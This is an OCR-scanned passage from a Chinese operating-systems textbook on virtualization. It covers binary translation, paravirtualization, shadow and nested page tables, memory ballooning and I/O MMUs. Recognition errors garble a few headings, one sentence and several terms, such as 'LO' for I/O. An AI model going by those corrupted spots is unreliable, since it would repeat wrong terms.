人 们 可 能 会 天 真 地 期 望 支持 VT 的 CPU 在 虚拟 化 上 比 软件 翻译 方法 性 能 更 好 ， 但 实验 结果 显示 两 者 
各 有 优 劣 (Adams 和 Agesen，2006)。VT 硬 件 使 用 的 陷入 并 模拟 方法 会 产生 大 量 陷入 ， 而 陷入 在 现代 硬 
件 上 开销 很 大 ， 因 为 CPU 高 速 缓存 、TLB、 转 移 预 测 都 会 受到 不 利 影响 。 当 敏感 指令 被 替换 为 (宿主 机 
进程 内 部 ) 对 虚拟 机 管理 程序 例 程 的 调用 后 ， 就 不 用 承担 这 些 上 下 文 切 换 的 开销 。 按 Adams 和 Agesen 的 
实验 所 示 ， 根 据 工 作 负载 的 不 同 ， 软 件 方法 有 时 优 于 硬件 方法 。 基 于 这 一 原因 ， 某 些 第 一 类 (和 第 二 类 ) 
虚拟 机 管理 程序 为 了 性 能 而 进行 二 进 制 翻译 ， 虽 然 无 须 二 进 制 翻译 虚拟 机 也 能 正确 运行 。 

使 用 二 进 制 翻译 后 ， 代 码 既 有 可 能 变 快 ， 也 有 可 能 变 慢 。 例 如 ， 假 设 客户 操作 系统 使 用 CLI (clear 
interrupt) 指令 禁用 硬件 中 断 。 根 据 体 系 结构 的 不 同 ， 这 条 指令 执行 可 能 很 慢 ， 在 具有 深度 流水 和 乱 序 
执行 技术 的 特定 CPU 上 会 占用 数 十 个 时 钟 周期 。 我 们 已 经 知道 ， 客 户 操作 系统 希望 关闭 中 断 并 不 意味 着 
虚拟 机 管理 程序 需要 真 的 关闭 它们 并 影响 整个 机 器 。 因 而 ， 虚 拟 机 管理 程序 必须 让 客户 机 认为 中 断 已 经 
关闭 ， 但 并 未 真 的 关闭 物理 机 器 的 中 断 。 要 实现 这 一 点 ， 虚 拟 机 管理 程序 可 以 在 为 每 个 客户 机 维护 的 虚 
拟 CPU 数 据 结构 中 记录 一 个 专门 的 IF (Interrupt Flag) 位 ， 以 确保 虚拟 机 在 中 断 打 开 前 不 会 收 到 任何 中 
断 。 客 户 机 执行 的 每 条 CLI 指 令 都 会 替换 成 类 似 VirtualCPU IF = 0 的 指令 ， 数 据 传送 指令 的 开销 很 小 ， 只 
需 1~3 个 时 钟 周 期 。 因 而 ， 翻 译 后 的 代码 执行 更 快 。 不 过 ,现代 的 VT 硬件 通常 情况 下 仍 比 软件 性 能 好 。 

另 一 方面 ， 如 果 客户 操作 系统 修改 页 表 ， 则 开销 会 很 大 。 每 个 客户 操作 系统 都 认为 自己 “拥有 ” 整 
个 机 器 ， 可 以 将 任意 虚拟 页 自由 映射 到 任意 物理 页 。 可 是 ， 如 果 一 个 虚拟 机 希望 使 用 的 物理 页 已 被 另 一 
个 虚拟 机 (或 虚拟 机 管理 程序 ) 使 用 ， 就 必须 采取 一 定 对 策 。 在 7.6 节 可 以 看 到 ， 解 决 方案 是 增加 一 层 
Re. 将 “客户 机 物理 页 ”映射 到 宿主 机 上 的 实际 物理 页 。 毫 无 疑问 ， 操 纵 多 重 页 表 的 开销 不 小 。 


7.5 虚拟 机 管理 程序 是 正确 的 微 内 核 吗 


第 一 类 和 第 二 类 虚拟 机 管理 程序 都 支持 未 修改 的 客户 操作 系统 ， 但 需要 费 尽 千 辛 万 苦 才 能 取得 较 好 
的 性 能 。 我 们 已 经 看 到 ， 半 虚拟 化 采取 了 不 同 的 方法 ， 要 求 修 改 客户 操作 系统 的 源 代码 。 半 虚拟 化 的 客 
户 机 执行 虚拟 化 调用 而 不 是 敏感 指令 。 实 际 上 ， 客 户 操作 系统 就 像 一 个 用 户 程序 ， 向 操作 系统 (虚拟 机 
管理 程序 ) 发 起 系统 调用 。 要 使 用 这 种 方式 ， 虚 拟 机 管理 程序 必须 定义 一 套 调用 接口 ， 以 供 客户 操作 系 
统 使 用 。 这 套 调 用 接口 实际 上 构成 了 应 用 编程 接口 (Application Programming Interface，API) ， 虽 然 接 
口 由 客户 操作 系统 而 非 应 用 程序 使 用 。 

更 进一步 ， 移 除 客户 操作 系统 中 的 所 有 敏感 指令 ， 只 让 它 通 过 虚拟 化 调用 访问 IO 等 系统 服务 ， 就 
将 虚拟 机 管理 程序 变 成 了 微 内 核 ， 如 图 1-26 所 示 。 半 虚拟 化 研究 中 ， 模 拟 硬件 指令 是 令 人 不 愉快 并 且 很 
花 时 间 的 。 模 拟 硬件 指令 要 求 客户 机 调用 虚拟 机 管理 程序 ， 然 后 由 虚拟 机 管理 程序 精确 模拟 一 条 复杂 指 
令 的 功能 。 让 客户 操作 系统 调用 虚拟 机 管理 程序 (或 微 内 核 ) 直接 进行 1O 等 操作 会 好 得 多 。 

于 是 ， 有 些 研究 人 员 认 为 应 将 虚拟 机 管理 程序 看 作 “ 正 确 的 微 内 核 ”(Hand 等 人 ，2005)。 首 先 要 
指出 的 是 这 是 一 个 充满 争议 的 话题 ， 一 些 研究 人 员 反 对 这 种 看 法 ， 认 为 两 者 之 间 没 有 足以 使 虚拟 机 管理 
程序 成 为 “正确 的 微 内 核 ” 的 本 质 差 别 。 另 一 些 研究 人 员 认 为 与 微 内 核 相 比 ， 虚 拟 机 管理 程序 并 不 太 适 
用 于 构建 安全 的 系统 ,他 们 提出 虚拟 机 管理 程序 应 扩展 消息 传递 、 内 存 共享 等 内 核 功 能 (Hohmuth 等 人 ， 
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2004)。 还 有 一 些 研究 人 员 认 为 虚拟 机 管理 程序 甚至 不 是 “正确 完成 的 操作 系统 研究 ”(Roscoe A, 
2007) 。 由 于 还 没有 人 评论 操作 系统 教材 “正确 ”与 否 ， 所 以 不 妨 深入 探讨 一 下 虚拟 机 管理 程序 与 微 内 
核 的 相似 之 处 。 

最 初 的 虚拟 机 管理 程序 模拟 整个 机 器 的 重要 原因 是 没有 客户 操作 系统 的 源 代码 (例如 Windows)， 
或 是 操作 系统 有 太 多 变种 (例如 Linux)。 也 许 未 来 虚拟 机 管理 程序 (或 微 内 核 ) API 将 标准 化 ， 之 后 的 
操作 系统 将 设计 成 调用 API 而 不 是 使 用 敏感 指令 。 这 样 做 可 以 使 虚拟 机 技术 更 易于 支持 与 使 用 。 

全 虚拟 化 和 半 虚 拟 化 的 区 别 如 图 7-5 所 示 。 这 里 有 两 台 由 VT 硬 件 支持 的 虚拟 机 。 左 边 的 客户 操作 系 
统 是 未 修改 的 Windows。 当 执行 一 条 敏感 指令 时 会 陷入 虚拟 机 管理 程序 ， 模 拟 这 条 指令 后 返回 。 右 边 的 
客户 操作 系统 是 修改 过 的 Linux， 不 再 包含 任何 敏感 指令 。 当 它 要 进行 /0 操作 或 修改 关键 的 内 部 寄存 器 
(如 指向 页 表 的 那个 ) 时 ， 就 执行 虚拟 化 调用 来 完成 ， 像 标准 Linux 中 的 应 用 程序 执行 系统 调用 那样 。 


全 虚拟 化 半 虚 拟 化 










由 于 虚拟 化 
调用 而 陷入 






未 经 修改 的 Windows A 









第 一 类 虚拟 机 管理 程序 


图 7-5 虚拟 化 与 半 虚 拟 化 


在 图 7-5 中 展示 的 虚拟 机 管理 程序 被 虚线 分 为 两 部 分 。 现 实 中 ， 只 有 一 个 程序 运行 在 硬件 上 。 一 部 
分 负责 解释 执行 陷入 的 敏感 指令 ， 本 例 中 这 些 敏感 指令 由 Windows 产 生 。 另 一 部 分 负责 完成 虚拟 化 调用 
的 功能 。 在 图 中 ， 后 一 部 分 标记 为 “ 微 内 核 "。 如 果 虚 拟 机 管理 程序 只 运行 半 虚 拟 化 的 客户 操作 系统 ， 
就 不 需要 模拟 敏感 指令 的 部 分 ， 得 到 的 是 一 个 真正 的 微 内 核 ， 只 提供 很 基本 的 服务 ， 如 进程 调度 、 
MMU 管 理 等 。 第 一 类 虚拟 机 管理 程序 与 微 内 核 之 间 的 界限 已 经 很 模糊 了 ， 随 着 虚拟 机 管理 程序 功能 及 
虚拟 化 调用 的 增多 ， 可 能 会 更 加 模糊 。 再 次 强调 ， 这 个 主题 是 充满 争议 的 。 但 越 来 越 清楚 的 是 ， 运 行 在 
裸 机 内 核 态 的 程序 应 当 小 而 可 靠 ， 只 包含 上 千 行 而 非 百 万 行 代 码 。 

客户 操作 系统 的 半 虚 拟 化 过 程 中 会 产生 一 些 问 题 。 首 先 ， 如 果 敏 感 指令 替换 成 对 虚拟 机 管理 程序 的 
调用 ， 那 么 操作 系统 如 何在 真实 硬件 上 运行 ? 毕竟 硬件 不 理解 这 些 虚拟 化 调用 。 其 次 ,市 场 上 有 多 种 
API 不 同 的 虚拟 机 管理 程序 怎么 办 ? 例如 VMware、 剑 桥 大 学 开源 的 Xen 和 微软 的 Hyper-V。 怎 样 修改 内 
核 使 之 能 运行 在 所 有 虚拟 机 管理 程序 上 ? 

Amsden 等 人 于 2006 年 提出 了 一 个 解决 方案 。 在 他 们 的 模型 中 ， 只 要 内 核 需要 执行 敏感 操作 ， 就 调 
用 特殊 的 例 程 。 这 些 例 程 称 作 虚 拟 机 接口 (Virtual Machine Interface，VMI) ， 组 成 了 硬件 及 虚拟 机 管理 
程序 的 底层 接口 。 这 些 例 程 在 设计 上 保持 通用 性 ， 未 绑 定 特定 硬件 平台 或 虚拟 机 管理 程序 。 

图 7-6 展 示 了 这 项 技术 的 一 个 例子 是 称 作 VMI Linux (VMIL) 的 半 虚 拟 化 Linux。 当 VMI Linux 运 行 
在 裸 机 上 时 ， 链 接 到 执行 实际 敏感 指令 的 库 ， 如 图 7-6a 所 示 。 当 运行 在 VMware 或 Xen 等 虚拟 机 管理 程序 
上 时 ， 客 户 操 作 系 统 链接 到 相应 的 执行 虚拟 化 调用 的 库 。 这 种 方式 既 实 现 了 操作 系统 的 核心 部 分 具有 可 
移植 性 ， 又 对 虚拟 机 管理 程序 友好 ， 同 时 还 保证 了 效率 。 

研究 人 员 也 提出 了 其 他 的 虚拟 机 接口 方案 。 半 虚拟 化 操作 (paravirt op) 是 比较 流行 的 一 个 方案 。 
此 方案 的 思想 在 概念 上 与 前 面 描述 的 相似 ， 但 细节 有 所 不 同 。IBM、VMware、Xen 和 Red Hat 等 Linux 厂 
商 提 倡 使 用 一 个 与 虚拟 机 管理 程序 无 关 的 接口 ， 该 接口 从 2.6.23 版 起 包含 在 主线 Linux 内 核 中 ， 让 内 核能 
与 任意 虚拟 机 管理 程序 (或 裸 机 ) 交流 。 
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VMIL 到 Xen 的 库 








图 7-6 运行 在 裸 机 (a), VMware (b) 和 Xen (c) 上 的 VMI Linux 


7.6 内 存 虚拟 化 


目前 为 止 ， 我 们 介绍 了 CPU 虚拟 化 的 问题 。 但 一 个 计算 机 系统 不 只 由 CPU 构成 ， 内 存 和 LO 设备 也 
需要 虚拟 化 。 让 我 们 来 看 看 实现 方式 。 

现代 计算 机 系统 几乎 都 支持 虚拟 内 存 ， 能 将 虚拟 地 址 空间 的 页 面 映 射 到 物理 内 存 的 页 面 。 这 个 映射 
由 (多 级 ) 页 表 定 义 。 通 常 ， 操 作 系统 通过 设置 CPU 的 一 个 指向 顶级 页 表 的 控制 寄存 器 来 改变 映射 。 虚 
拟 化 极 大 地 增加 了 内 存 管理 的 复杂 度 ， 硬 件 生产 商 尝 试 了 两 次 后 才 正 确 解决 。 

例如 ， 假 设 一 台 虚 拟 机 正在 运行 ， 客 户 操作 系统 决定 将 虚拟 页 7、4、3 映 射 到 物理 页 10、11、12。 
它 构建 包含 这 一 映射 的 页 表 ， 将 顶级 页 表 的 地 址 载 入 硬件 寄存 器 中 。 这 条 载 人 指令 是 敏感 的 ， 在 VT 
CPU 上 会 陷 人 ， 在 动态 翻译 系统 上 会 替换 成 调用 虚拟 机 管理 程序 例 程 ， 在 半 虚 拟 化 系统 上 会 替换 成 虚拟 
化 调用 。 为 了 简单 起 见 ， 假 设 这 条 指令 陷入 第 一 类 虚拟 机 管理 程序 ， 但 三 种 情况 下 问题 是 相同 的 。 

虚拟 机 管理 程序 如 何 处 理 ? 一 种 解决 方案 是 确实 将 物理 页 10、11、12 分 配给 这 个 虚拟 机 ， 并 设置 实 
际 的 页 表 将 虚拟 页 7、4、3 映 射 过 来 。 这 样 做 到 目前 为 止 还 没有 问题 。 

现在 假设 第 二 台 虚 拟 机 启动 并 将 虚拟 页 4、5、6 映 射 到 物理 页 10、11、12， 加 载 控 制 寄 存 器 指向 自 
己 的 页 表 。 虚 拟 机 管理 程序 捕获 陷入 后 该 怎么 办 呢 ? 它 不 能 直接 使 用 此 映射 ， 因 为 物理 页 I0、11、12 已 
被 使 用 。 它 可 以 使 用 其 他 空闲 物理 页 ， 比 如 说 20、21、22， 但 需要 创建 新 的 页 表 映 射 ， 将 第 二 台 虚 拟 机 
的 虚拟 页 4、5、6 映 射 过 来 。 如 果 又 有 一 台 虚 拟 机 启动 并 试图 使 用 物理 页 10、11、12， 虚 拟 机 管理 程序 
就 又 要 重复 这 一 过 程 。 总 之 ， 对 每 台 虚 拟 机 ， 虚 拟 机 管理 程序 都 需要 创建 一 个 影子 页 表 (shadow page 
table)， 将 虚拟 机 使 用 的 虚拟 页 映射 到 它 分 配给 虚拟 机 的 实际 物理 页 上 。 

更 糟糕 的 是 ， 每 次 客户 操作 系统 修改 页 表 ， 虚 拟 机 管理 程序 都 需要 修改 影子 页 表 。 例 如 ， 如 果 客 户 
操作 系统 将 虚拟 页 7 由 物理 页 10 重 新 映射 到 物理 页 200， 虚 拟 机 管理 程序 就 必须 知道 这 一 变动 。 问 题 在 于 
客户 操作 系统 只 要 修改 内 存 就 能 修改 页 表 。 然 而 修改 内 存 并 不 涉及 敏感 指令 ， 所 以 虚拟 机 无 法 察觉 ， 也 
就 无 法 更 新 实际 硬件 使 用 的 影子 页 表 。 

一 种 可 行 但 笨拙 的 解决 方案 是 让 虚拟 机 管理 程序 跟踪 客户 机 虚拟 内 存 中 保存 顶级 页 表 的 页 面 。 当 客 
户 机 首次 尝试 载 入 指向 顶级 页 表 的 硬件 寄存 器 时 ， 因 为 需要 使 用 敏感 指令 ， 所 以 虚拟 机 管理 程序 能 获得 
顶级 页 表 所 在 的 页 面 信息 。 虚 拟 机 管理 程序 可 以 在 此 时 创建 影子 页 表 ， 并 将 顶级 页 表 及 其 指向 的 下 级 页 
表 设 为 只 读 。 这 样 客户 操作 系统 接 下 来 如 果 试 图 修改 页 表 就 会 导致 缺 页 异常 ， 并 将 控制 流 交 给 虚拟 机 管 
理 程序 。 虚 拟 机 管理 程序 能 够 分 析 指 令 流 以 了 解 客户 操作 系统 的 意图 ， 并 相应 地 修改 影子 页 表 。 这 种 做 
法 不 够 优雅 ， 但 在 原则 上 是 可 行 的 。 

另 一 个 同样 笨拙 的 解决 方案 做 法 恰好 相反 。 虚 拟 机 管理 程序 允许 客户 机 向 页 表 添加 任何 新 映射 ， 而 
影子 页 表 不 做 任何 改动 。 事 实 上， 虚拟 机 管理 程序 甚至 不 知道 客户 机 页 表 发 生 了 变化 。 然 而 ， 只 要 客户 
机 试图 访问 新 映射 的 页 面 ， 就 会 产生 缺 页 异常 ， 将 控制 流 交 还 虚拟 机 管理 程序 。 这 时 虚拟 机 管理 程序 就 
可 以 探测 客户 机 页 表 ， 看 看 影子 页 表 是 否 需要 添加 新 的 映射 ， 如 果 需 要 就 添加 后 重新 执行 触发 缺 页 异常 
的 指令 。 那 么 如 何 处 理 客户 机 从 页 表 中 删除 映射 的 情况 ? 显然 ， 虚 拟 机 管理 程序 不 能 等 待 缺 页 异常 ， 因 
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为 不 会 发 生 缺 页 异常 。 从 页 表 中 删除 映射 后 需要 执行 INVLPG 指 令 (真实 意图 是 使 TLB 项 失效 )， 虚 拟 机 
管理 程序 可 以 截获 此 敏感 指令 并 删除 影子 页 表 中 的 对 应 项 。 同 样 ， 这 种 做 法 不 够 优雅 但 是 可 行 。 

这 两 种 方法 都 会 带 来 大 量 缺 页 异常 ， 而 处 理 缺 页 异常 开销 很 大 。 我 们 要 将 由 于 客户 机 程序 访问 被 换 
出 RAM 的 页 面 导 致 的 “正常 ” 缺 页 异常 和 由 于 保证 影子 页 表 与 客户 机 页 表 一 致 而 导致 的 缺 页 异常 区 分 
开 来 。 前 者 是 客户 机 导致 的 缺 页 异常 ， 虽 然 由 虚拟 机 管理 程序 捕获 ， 但 需要 交 给 客户 机 处 理 。 后 者 是 虚 
拟 机 管理 程序 导致 的 缺 页 异常 ， 处 理 方式 是 更 新 影子 页 表 。 

缺 页 异常 的 开销 很 大 ， 在 虚拟 化 环境 中 尤为 突出 ， 因 为 缺 页 异常 会 导致 虚拟 机 退出 (VM exit), ， 虚 
拟 机 管理 程序 重新 获得 控制 流 。 下 面 看 看 虚拟 机 退出 时 CPU 要 做 些 什 么 。 首 先 ，CPU 需 要 记录 导致 虚拟 
机 退出 的 原因 以 便 虚 拟 机 管理 程序 能 够 进行 相应 处 理 。CPU 还 需 记录 导致 虚拟 机 退出 的 客户 机 指令 的 地 
址 。 接 下 来 ，CPU 进 行 上 下 文 切换 ,保存 所 有 寄存 器 。 然 后 ，CPU 载 入 虚拟 机 管理 程序 的 处 理 器 状态 。 
此 后 虚拟 机 管理 程序 才 可 以 开始 处 理 缺 页 异常 ， 仅 仅 开始 处 理 缺 页 异常 的 开销 就 很 大 。 处 理 完毕 后 ,之 
前 的 步骤 还 需要 反 过 来 再 进行 一 遍 。 整 个 过 程 消耗 的 时 钟 周 期 数 超过 几 万 个 ， 因 此 人 们 才 竭 尽 全 力 减 少 
虚拟 机 退出 的 情况 。 

在 半 虚 拟 化 操作 系统 中 情况 有 所 不 同 。 客 户 机 的 半 虚 拟 化 操作 系统 知道 ， 完 成 修改 页 表 操作 后 要 通 
知 虚 拟 机 管理 程序 。 因 此 ， 客 户 操作 系统 首先 完成 对 页 表 的 全 部 修改 ， 然 后 执行 虚拟 化 调用 通知 虚拟 机 
管理 程序 页 表 更 新 的 情况 。 这 样 就 不 需要 每 次 页 表 改 动 都 触发 缺 页 异常 ， 只 需要 全 部 修改 完成 后 进行 一 
次 虚拟 化 调用 即 可 ， 显 然 更 加 高 效 。 

1. RED RNB 

Ay ST iRE Sb FEE EAN ASH, tS Ae RT REAR (nested page table) 的 硬件 支持 。 
伐 套 页 表 是 AMD 使 用 的 术语 ，Intel 将 其 称 作 EPT (extended page table， 扩 展 页 表 )。 两 者 目的 相似 ， 都 
是 在 无 需 陷 入 的 情况 下 由 硬件 处 理 虚 拟 化 引发 的 额外 页 表 操 作 ， 以 降低 开销 。 有 趣 的 是 ，Intel x86 硬 件 
的 第 一 代 虚 拟 化 扩展 不 支持 内 存 虚 拟 化 。 虽 然 YT 避 免 了 很 多 CPU 虚拟 化 中 的 瓶颈 ， 但 页 表 操 作 仍 然 有 
很 大 开销 。AMD 和 Intel 花 了 几 年 时 间 才 生产 出 能 有 效 虚 拟 化 内 存 的 硬件 。 

即使 没有 虚拟 化 ， 操 作 系 统 仍然 维护 虚拟 页 与 物理 页 之 间 的 上 映射。 硬件 在 这 些 页 表 查 找 虚拟 地 址 对 
应 的 物理 地 址 。 加 入 虚拟 机 之 后 只 需 额 外 增加 一 层 映射 。 例 如 ， 假 设 需要 将 Xen 或 VMware ESX Server 
等 第 一 类 虚拟 机 管理 程序 上 运行 的 Linux 进 程 的 虚拟 地 址 翻译 成 物理 地 址 。 除 了 客户 机 虚拟 地 址 (guest 
virtual address) 之 外 ， 还 有 客户 机 物理 地 址 (guest physical address) 和 宿主 机 物理 地 址 (host physical 
address， 又 作 machine physical address)。 我 们 已 经 看 到 ， 如 果 没 有 EPT， 虚 拟 机 管理 程序 负责 显 式 维护 
影子 页 表 。 有 了 EPT， 虚 拟 机 管理 程序 仍然 有 一 套 额外 的 页 表 ， 但 CPU 能 处 理 其 中 的 大 量 中 间 操 作 。 在 
我 们 的 例子 中 ， 硬 件 首 先 查找 客户 机 虚拟 地 址 到 客户 机 物理 地 址 的 “普通 ”页 表 ， 就 像 没有 虚拟 化 时 的 
做 法 那样 。 区 别 是 硬件 还 查找 扩展 (RRE) 页 表 以 找到 宿主 机 物理 地 址 ， 而 无 须 软 件 干 预 。 每 次 访问 
客户 机 物理 地 址 时 都 要 进行 此 操作 。 地 址 翻译 的 整个 过 程 如 图 7-7 所 示 。 
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图 7-7 每 一 次 访问 客户 操作 系统 的 物理 地 址 (包括 访问 客户 操作 系统 的 各 级 页 表 ) 时 都 需要 访问 扩展 / 杠 套 页 表 
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遗憾 的 是 ,硬件 访问 嵌 套 页 表 比 想象 中 更 频繁 。 让 我 们 假设 客户 机 虚拟 地 址 未 缓存 ， 需 要 进行 完整 
的 页 表 查 找 ， 分 页 层次 中 的 每 一 层 页 表 查 找 都 会 导致 一 次 戏 套 页 表 查 找 。 也 就 是 说 ， 随 着 分 页 层次 的 增 
加 ， 访 存 次 数 会 呈 平 方 级 地 增长 。 即 便 如 此 ，EPT 仍 然 极 大 地 减少 了 虚拟 机 退出 的 数量 。 虚 拟 机 管理 程 
序 无 须 将 客户 机 页 表 映 射 为 只 读 ， 告 别 了 影子 页 表 的 处 理 。 更 重要 的 是 ， 切 换 虚 拟 机 时 只 需要 改变 EPT 
映射 ， 就 像 操 作 系统 切换 进程 时 改变 普通 的 映射 一 样 。 

2. 回收 内 存 

运行 在 相同 物理 硬件 上 的 所 有 虚拟 机 都 有 自己 的 物理 内 存 页 ， 并 认为 自己 支配 着 整个 机 器 。 这 种 设 
计 非 常 好 ， 但 内 存 需要 回收 时 就 会 发 生 问 题 ， 特 别 是 与 内 存 过 量 使 用 (overcommitment) 功能 结合 时 。 
内 存 过量 使 用 是 指 虚拟 机 管理 程序 向 所 有 虚拟 机 提供 的 物理 内 存 总 量 会 超过 系统 中 实际 的 物理 内 存 大 
小 。 一 般 而 言 ， 这 个 想法 很 好 ， 虚 拟 机 管理 程序 可 以 同时 创建 更 多 配置 更 高 的 虚拟 机 。 例 如 ， 一 台 机 器 
有 32GB 物 理 内 存 ， 可 以 运行 三 台 各 16GB 内 存 的 虚拟 机 。 从 数值 上 来 看 显然 是 不 匹配 的 。 然 而 ， 三 台 
拟 机 可 能 并 不 会 同时 用 到 物理 内 存 的 上 限 ， 或 者 可 能 共享 一 些 具 有 相同 内 容 的 页 面 (例如 Linux 内 核 )， 
这 时 便 可 使 用 去 重 (deduplication) 优化 技术 。 在 这 种 情况 下 ， 三 台 虚 拟 机 使 用 的 物理 内 存 总 量 小 于 
16GB 的 三 倍 。 去 重 技术 后 面 再 作 讨论 。 目 前 关注 的 问题 是 随 着 工作 负载 的 变化 ， 之 前 合理 的 虚拟 机 物 
理 内 存 分 配 可 能 变 得 不 再 合适 。 也 许 虚拟 机 1 需要 更 多 内 存 而 虚拟 机 2 需求 少 一 些 ， 这 样 虚拟 机 管理 程序 
就 需要 将 内 存 资源 从 一 台 虚 拟 机 转移 到 另 一 台 ， 以 使 系统 整体 受益 。 问 题 是 ， 怎 样 安全 地 回收 已 分 配给 
一 台 虚 拟 机 的 物理 内 存 页 ? 

原则 上 ， 可 以 再 增加 一 层 分 页 。 当 内 存 短缺 时 ， 虚 拟 机 管理 程序 可 以 换 出 一 些 虚拟 机 的 页 ， 就 像 操 
作 系统 换 出 应 用 程序 的 一 些 页 。 这 种 方法 的 缺点 是 必须 由 虚拟 机 管理 程序 完成 ， 然 而 它 并 不 清楚 不 同 页 
对 客户 机 的 重要 性 差异 ， 因 而 换 出 的 页 面 可 能 是 错误 的 。 即 使 虚拟 机 管理 程序 选择 了 正确 的 页 ( 即 客户 
操作 系统 也 会 选择 的 页 ) 换 出 ， 接 下 来 还 有 更 多 问题 。 例 如 ， 假 设 虚拟 机 管理 程序 换 出 页 P， 稍 后 客户 
操作 系统 也 决定 将 P 换 出 到 磁盘 。 遗 憾 的 是 ， 虚 拟 机 管理 程序 与 客户 操作 系统 的 交换 空间 不 同 。 也 就 是 
说 ， 虚 拟 机 管理 程序 首先 要 将 P 换 入 内 存 ， 然 后 看 着 客户 操作 系统 立即 又 将 其 换 出 到 磁盘 。 这 太 低 效 了 。 

常用 的 解决 方案 是 使 用 称 作 气球 (ballooning) 的 技术 。 一 个 小 的 气球 模块 作为 伪 设 备 驱 动 程序 加 载 
到 每 个 虚拟 机 中 ， 与 虚拟 机 管理 程序 通信 。 气 球 模块 在 虚拟 机 管理 程序 的 请 求 下 可 以 通过 申请 锁定 页 面 
来 膨胀 ， 也 可 以 通过 释放 这 些 页 面 而 紧缩 。 气 球 膨胀 ， 客 户 机 的 实际 可 用 物理 内 存 减 少 ， 客 户 操作 系统 
| 将 以 换 出 最 不 重要 页 面 的 方式 响应 这 一 变化 ， 正 如 期 望 的 那样 。 反 过 来 ， 气 球 紧缩 ， 客 户 机 可 用 内 存 增 
加 。 虚 拟 机 管理 程序 让 操作 系统 来 帮 它 作 决 定 ， 通 俗 地 讲 这 叫 踢 皮球 (passing the buck/euro/pound/yen) 。 
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| 前 面 介绍 了 CPU 和 内 存 虚拟 化 ， 接 下 来 研究 一 下 IO 虚拟 化 。 客 户 操作 系统 启动 时 通常 会 探测 连接 
| 了 哪些 IO 设备 ， 这 些 探测 将 陷入 虚拟 机 管理 程序 ， 后 者 应 该 如 何 处 理 ? 一 种 方法 是 回复 实际 硬件 中 的 
磁盘 、 打 印 机 等 ， 客 户 机 将 加 载 这 些 设备 的 驱动 程序 并 试图 使 用 它们 。 设 备 驱动 程序 尝试 进行 实际 IO 
操作 时 将 会 读 写 硬件 设备 寄存 器 。 这 些 指 令 是 敏感 的 ， 将 陷入 虚拟 机 管理 程序 ， 按 照 需 要 读 取 或 写 人 相 
应 的 硬件 寄存 器 。 

但 这 里 同样 有 一 个 问题 。 每 个 客户 操作 系统 都 认为 自己 拥有 整个 磁盘 分 区 ， 而 虚拟 机 的 数量 可 能 比 
| 磁盘 分 区 数 多 得 多 。 通 常 ， 解 决 方案 是 让 虚拟 机 管理 程序 在 实际 磁盘 上 创建 一 个 文件 或 一 块 区 域 作为 虚 
拟 机 的 磁盘 。 由 于 客户 操作 系统 试图 按 实际 硬件 中 的 磁盘 进行 控制 ， 因 此 虚拟 机 管理 程序 能 理解 其 控制 
| 方式， 将 访问 的 块 编号 转换 成 用 于 存储 的 文件 或 区 域 的 偏 移 值 ， 并 进行 IO。 
客户 机 使 用 的 磁盘 也 可 以 与 实际 硬件 不 同 。 例 如 ， 实 际 磁盘 是 使 用 新 型 接口 的 高 性 能 磁盘 (或 
| RAID)， 而 虚拟 机 管理 程序 可 以 告诉 客户 操作 系统 磁盘 是 老式 IDE 磁 盘 。 让 客户 操作 系统 安装 IDE 磁 盘 
驱动 程序 ， 当 此 驱动 程序 发 出 IDE 磁 盘 命 令 时 ， 虚 拟 机 管理 程序 将 其 转换 成 驱动 新 型 磁盘 的 命令 。 使 用 
| 这 种 策略 可 以 在 不 改变 软件 的 情况 下 升级 硬件 ， 虚 拟 机 的 这 种 重新 映射 硬件 的 能 力 是 VM/370 受 欢迎 的 
原因 之 一 : 某 些 公司 想 要 购买 更 新 更 快 的 硬件 ， 但 又 不 想 改变 软件 ， 而 虚拟 机 技术 使 之 成 为 可 能 。 

关于 IO 的 另 一 个 有 趣 的 想法 是 虚拟 机 管理 程序 可 以 扮演 虚拟 交换 机 的 角色 。 每 个 虚拟 机 都 有 一 个 
MAC 地 址 ， 虚 拟 机 管理 程序 像 以 太 网 交换 机 一 样 在 不 同 虚 拟 机 之 间 交 换 帧 。 虚 拟 交 换 机 有 几 个 优势 ， 
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如 便于 重新 配置 、 容 易 进 行 功能 增强 (如 安全 性 扩展 ) 等 。 

1. MO MMU 

LO 模拟 中 另 一 个 需要 考虑 的 是 DMA 使 用 绝对 内 存 地 址 的 问题 。 人 们 可 能 希望 虚拟 机 管理 程序 在 
DMA 开 始 前 介入 并 重新 映射 地 址 ， 然 而 硬件 上 已 经 有 了 LO MMU， 可 以 像 MMU 虚 拟 化 内 存 那样 虚拟 化 
VO, VO MMU 有 不 同 的 形式 ， 适 用 于 不 同 处 理 器 体系 结构 。 即 使 只 看 x86，Intel 和 AMD 采 用 的 技术 也 
有 细微 差别 。 当 然 ， 技 术 背 后 的 思想 是 相同 的 。IUO MMU 这 一 硬件 功能 消除 了 虚拟 化 中 的 DMA 问 题 。 

像 普 通 MMU 一 样 ，ILO MMU 用 页 表 将 设备 想 要 使 用 的 内 存 地 址 (设备 地 址 ) 映射 到 物理 地 址 。 在 
虚拟 环境 中 ， 虚 拟 机 管理 程序 可 以 设置 页 表 以 避免 设备 进行 DMA 时 影响 到 当前 虚拟 机 之 外 的 内 存 。 

IO MMU 在 处 理 虚 拟 环境 中 的 设备 时 有 许多 优势 。 设 备 穿 透 (device pass through) 允许 将 物理 设 
备 直接 分 配给 特定 虚拟 机 。 通 常 ， 设 备 地 址 空间 与 客户 机 物理 地 址 空间 完全 相同 比较 有 利 ， 而 这 依赖 于 
I/O MMU, VO MMU 可 以 将 设备 地 址 与 虚拟 机 地 址 映射 为 相同 的 空间 ， 并 且 这 一 映射 对 设备 和 虚拟 机 
来 说 都 是 透明 的 。 

设备 隔离 (device isolation) 保证 设备 可 以 直接 访问 其 分 配 到 的 虚拟 机 的 内 存 空 间 而 不 影响 其 他 虚 
拟 机 的 完整 性 。 也 就 是 说 IO MMU 能 防止 错误 的 DMA 通 信 ， 就 像 普通 MMU 能 防止 进程 的 错误 内 存 访 问 
一 样 ， 两 者 在 访问 未 映射 页 面 时 都 会 导致 缺 页 异常 。 

除了 DMA 和 设备 地 址 ，I1/O 虚 拟 化 还 需要 处 理 中 断 ， 使 设备 产生 的 中 断 以 正确 的 中 断 号 抵达 正确 的 
虚拟 机 。 因 此 ， 现 代 IO MMU 还 支持 中 断 重 映射 (interrupt remapping)。 比 如 一 个 设备 发 送 了 中 断 号 为 
1 的 消息 ， 消 息 首先 抵达 IO MMU, ， 通 过 中 断 重 映射 表 转 换 为 一 个 新 的 中 断 ， 目 标 是 正在 运行 指定 虚拟 
